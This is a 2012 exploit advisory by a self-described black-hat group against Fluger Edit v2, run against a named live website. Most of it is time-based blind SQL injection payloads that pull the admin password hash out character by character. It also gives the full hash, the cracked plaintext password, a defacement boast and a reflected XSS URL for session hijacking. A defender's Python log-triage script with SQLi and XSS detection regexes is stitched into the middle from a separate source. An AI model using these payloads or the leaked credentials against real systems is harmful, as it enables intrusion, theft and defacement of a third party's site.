Fluger Edit 2 Blind SQL Injection / Cross Site Scripting

Posted Sep 2, 2012
Authored by Akastep

Fluger Edit version 2 suffers from cross site scripting and remote blind SQL injection vulnerabilities. Note that this finding houses site-specific data.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 776957ea2e591ce4de92073c69025a61eb40469401729fc6ccd644600e0fcd1f

=====================================================
Vulnerable Software: Fluger Edit v.2 || administration software
Vendor: http://www.fluger.com/
Software License: Commercial
Vulnerabilities: Blind SQL Injection And XSS
Tested: In Wild
=====================================================


Dork :
Designed and developed by Fluger IT
All right reserved © | 2004 - 2012

************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************


======================================================
Fully disclosed real exploitation examples:
GPC (magic_quotes_gpc) MUST BE OFF

There is a blind SQLi vulnerability on the login page:

http://www.artclima.am/edit/ <===(Admin panel)


The vulnerable endpoint is here: http://www.artclima.am/edit/config_secure/verify.php

(Sorry, I have no access to the source code)

CMS looks like: http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png

Due to the authentication mechanism you can't bypass the login form by sending:
'or''='

Instead, you can use the time-based approach to obtain login:password pairs from the admin table: the injected IF(...) calls sleep() only when the guessed condition is true, so the response delay leaks one answer per request.
Here we go:

Print screens: http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png




http://www.artclima.am/edit/index.php?error


Headers:

Host: www.artclima.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=:$
Content-Type: application/x-www-form-urlencoded
Content-Length: 28



POST DATA:

username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


*REPLAY*


The login has a blind SQLi.
Bypass does not go through.

Time Based RuleZ!

www.artclima.am/edit/index.php?error

columns:

user
password


table: admin




=========================================

There is 1 user:

//TRUE
username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir

Let's pull the login


login: admin


//TRUE

username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir



Let's pull the password:


=========================================
1st character: e

username=' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

2nd character: 0

username=' or (select if(substr(password,2,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

3rd character: 4

username=' or (select if(substr(password,3,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

4th character: 4

username=' or (select if(substr(password,4,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
5th character: 6

username=' or (select if(substr(password,5,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================
6th character: 5

username=' or (select if(substr(password,6,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
7th character: 0

username=' or (select if(substr(password,7,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
8th character: a

username=' or (select if(substr(password,8,1)='a',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================
9th character: 5

username=' or (select if(substr(password,9,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================

10th character: 6

username=' or (select if(substr(password,10,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

11th character: 7

username=' or (select if(substr(password,11,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

12th character: e

username=' or (select if(substr(password,12,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
13th character: d

username=' or (select if(substr(password,13,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

check later

=========================================
14th character: 2

username=' or (select if(substr(password,14,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================
15th character: b


username=' or (select if(substr(password,15,1)='b',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

16th character: 2

username=' or (select if(substr(password,16,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================


17th character: d

username=' or (select if(substr(password,17,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
18th character: 0

username=' or (select if(substr(password,18,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

19th character: 4

username=' or (select if(substr(password,19,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

20th character: 3

username=' or (select if(substr(password,20,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
21st character: 0

username=' or (select if(substr(password,21,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================
22nd character: 3

username=' or (select if(substr(password,22,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================

23rd character: e

username=' or (select if(substr(password,23,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
24th character: 3

username=' or (select if(substr(password,24,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

25th character: 7

username=' or (select if(substr(password,25,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

26th character: 9

username=' or (select if(substr(password,26,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

27th character: 3

username=' or (select if(substr(password,27,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

28th character: d


username=' or (select if(substr(password,28,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
29th character: f

username=' or (select if(substr(password,29,1)='f',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
30th character: d

username=' or (select if(substr(password,30,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
31st character: 9

username=' or (select if(substr(password,31,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================

32nd character: 5

username=' or (select if(substr(password,32,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================


Verification: +


//TRUE
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

MD5: e044650a567ed2b2d04303e3793dfd95

Resolves to: price777

Sure! I will "rm"-it too with great pleasure!

Rmned: http://zone-h.org/mirror/id/18295382





Second way: session hijack to gain access to the admin panel:

XSS:
http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1


Print Screen:
http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png





From the page source:




<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="h350">
<tr valign="top">
<td class="bg_content">
<div id="printarea">
<table cellpadding="0" cellspacing="0" border="0" summary="" style="height: 24px;" width="100%" class="tabfree">
<tr>
<td class="tabcurrent">Title Ptoduct<script>alert("OwnEd By AkaStep");</script></td>
<td>&nbsp;</td>
</tr>
</table>
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="boxborder" >
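A defender's log triage for the two payload shapes this advisory shows (the sleep()-driven login probe against verify.php and the reflected <script> in type_name), as an added example that is not part of the advisory; the log format, sample lines, threshold and the helper names are all constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed sample request log (not taken from the advisory), one request per
# line: "<method> <url> <urlencoded-body-or-dash> <duration-ms>". Lines 2 and 3
# mirror the payload shapes the advisory shows against verify.php and admin.php.
SAMPLE_LOG = """\
POST /edit/config_secure/verify.php username=admin&password=hunter2 120
POST /edit/config_secure/verify.php username=%27+or+%28select+if%28substr%28password%2C1%2C1%29%3D%27e%27%2Csleep%2830%29%2C0%29+from+admin+limit+1%29--+and+5%3D%275&password=x 30210
GET /edit/admin.php?page=news_admin/news&type_name=Title%3Cscript%3Ealert%281%29%3C/script%3E - 45
GET /edit/index.php?error - 12
"""

# Indicator patterns derived from the two payload shapes on this page.
PATTERNS = {
    "sqli-time-based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "sqli-shape": re.compile(r"\bif\s*\(\s*substr\s*\(|'\s*or\s|--\s", re.I),
    "xss-marker": re.compile(r"<\s*/?\s*script\b|javascript:|\bon[a-z]+\s*=", re.I),
}
SLOW_MS = 5000  # assumed threshold: a login round-trip this slow is itself a signal
LOGIN_PATH = "/edit/config_secure/verify.php"


def decode_params(raw):
    """Return decoded parameter values; decode twice to defeat double-encoding."""
    if raw in ("", "-"):
        return []
    return [unquote_plus(v) for _, v in parse_qsl(raw, keep_blank_values=True)]


def triage_line(line):
    """Return {"method", "path", "tags"} for one log line; tags is a set of indicators."""
    method, url, body, ms = line.split()
    path, _, query = url.partition("?")
    tags = set()
    for value in decode_params(query) + decode_params(body):
        for tag, rx in PATTERNS.items():
            if rx.search(value):
                tags.add(tag)
    if path == LOGIN_PATH and int(ms) > SLOW_MS:
        tags.add("slow-response")  # sleep()-driven inference shows up as latency
    return {"method": method, "path": path, "tags": tags}


def triage_log(text):
    """Return only the requests that carry at least one indicator."""
    hits = [triage_line(l) for l in text.splitlines() if l.strip()]
    return [h for h in hits if h["tags"]]


if __name__ == "__main__":
    for hit in triage_log(SAMPLE_LOG):
        print(hit["method"], hit["path"], sorted(hit["tags"]))
```

The latency tag matters because a WAF-evading probe can rewrite the keywords, but the 30-second delay that makes the inference work cannot be hidden from the server's own timing.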



==========================THE END=========================






SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep


02.09.2012




